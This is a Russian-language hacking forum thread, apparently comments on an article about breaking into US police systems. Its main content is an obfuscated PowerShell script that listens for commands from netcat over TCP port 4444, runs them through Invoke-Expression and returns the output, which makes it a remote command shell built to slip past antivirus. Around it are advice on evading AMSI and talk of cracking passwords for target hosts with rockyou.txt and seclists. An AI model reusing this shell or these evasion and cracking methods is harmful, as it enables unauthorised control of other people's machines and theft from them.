Статья Как я ломал копов в USA или почему они все ACAB ?

[netcat]

В правильном направлении мыслишь. PowerShell на данный момент это топ 1 решение по обходу ав. Инфа не с потолка. Я лично реверсил устройство amsi и как powershell взаимодействует с ним, при интерпретации скрипта (исходники powershell). Возможно почистить рантайм малвари на пш в 0. То, что некоторые (нативщики), считают невозможным или достижимым только с помощью кернел фич.

спасибо за активность ) думаю не только я буду рад почитать про фишки по Powershell. уверен люди поддержат и оценят

 

[BaPaTok]

В правильном направлении мыслишь. PowerShell на данный момент это топ 1 решение по обходу ав. Инфа не с потолка. Я лично реверсил устройство amsi и как powershell взаимодействует с ним, при интерпретации скрипта (исходники powershell). Возможно почистить рантайм малвари на пш в 0. То, что некоторые (нативщики), считают невозможным или достижимым только с помощью кернел фич.

Вполне возможно, вот замутил, не думаю, что какую нибудь АВ поймет, что это за муйня висит на 4444 порту.

.("{0}{1}{2}" -f 's','ET-','ITEM') ('VARI'+'aB'+'Le:'+'I'+'n0m5') ([tYpE]("{2}{0}{1}" -F'EXt.ENcoDI','ng','T') ); ${cL`Ie`Nt}=.("{2}{0}{1}"-f'-Objec','t','New') ("{3}{1}{2}{0}{4}"-f's.TCP','.Net.Sock','et','System','Client')(("{0}{2}{1}" -f'127','1','.0.0.'),4444);${STre`Am}=${CLi`e`Nt}.("{0}{1}"-f'GetStre','am').Invoke();[byte[]]${B`Y`TEs}=0..65535|&('%'){0};while((${re`AD}=${StrE`Am}.("{0}{1}"-f'Re','ad').Invoke(${B`y`Tes}, 0, ${b`Y`TeS}."l`eN`GTH")) -ne 0){;${CO`M`maND}=(&("{0}{3}{2}{1}"-f 'N','bject','O','ew-') -TypeName ("{1}{3}{4}{2}{0}" -f 'ncoding','System.','.ASCIIE','T','ext'))."gets`TRiNg"(${BY`TeS},0, ${RE`AD});${o`U`Tput}=(&("{1}{0}" -f 'X','IE')(${co`m`mANd}) 2>&1 | &("{0}{1}{2}"-f 'Out','-Strin','g'));${seND`B`YTE}=( ( .('lS') ('VarI'+'AB'+'le:'+'I'+'N0M5') ).vaLuE::"aS`CiI").("{1}{2}{0}"-f 'ytes','Ge','tB').Invoke(${o`Ut`pUT});${STr`E`AM}.("{0}{1}"-f'W','rite').Invoke(${S`ENDB`Y`Te},0,${sENd`BY`Te}."Len`gth");${s`Tre`Am}.("{0}{1}" -f'Fl','ush').Invoke()};${cl`i`ENt}.("{0}{1}"-f'Clos','e').Invoke();Exit

А эта штука может принимать команды от netcat.
UPD: Батник глючит, лучше повершел предварительно вызвать, потом воткнуть код.

 

[Haunt]

Вполне возможно, вот замутил

Это херня, а не обфускация. Этим ты не обойдёшь ав. Ты обфусцируешь на уровне скриптблоков, а надо на уровне стейтментов.

 

[mag_nat]

"великий Rockyou.txt" [rofl] - это словарь, сделанный из говна, причём безрукими для безголовых. Откройте его и почитайте что там. Из самого элементарного - отберите строки длиннее 20 символов и я гарантирую вам вечер полный безудержного веселья.

 

[netcat]

"великий Rockyou.txt" [rofl] - это словарь, сделанный из говна, причём безрукими для безголовых. Откройте его и почитайте что там. Из самого элементарного - отберите строки длиннее 20 символов и я гарантирую вам вечер полный безудержного веселья.

ну если учитывать что хостов не так много, а пассов нужно больше. для работы были готовы и другие seclist. главное нужный пароль был найден. ну согласен с тем что он был в начале а не в конце ))

 

[mag_nat]

Спойлер

ну если учитывать что хостов не так много, а пассов нужно больше. для работы были готовы и другие seclist. главное нужный пароль был найден. ну согласен с тем что он был в начале а не в конце ))

Да я и сам им когда-то пользовался, не вижу в этом ничего зазорного, если это даёт приемлемый по времени и выхлопу результат. Просто фраза так триггернула, что уже не смог промолчать. ??

 

[CaseyJones]

чуть позже сделаю маленький FAQ и раскидаю по сбору нужной инфы.

Было бы многим интересно. Отличная бы тема вышла для еще одной статьи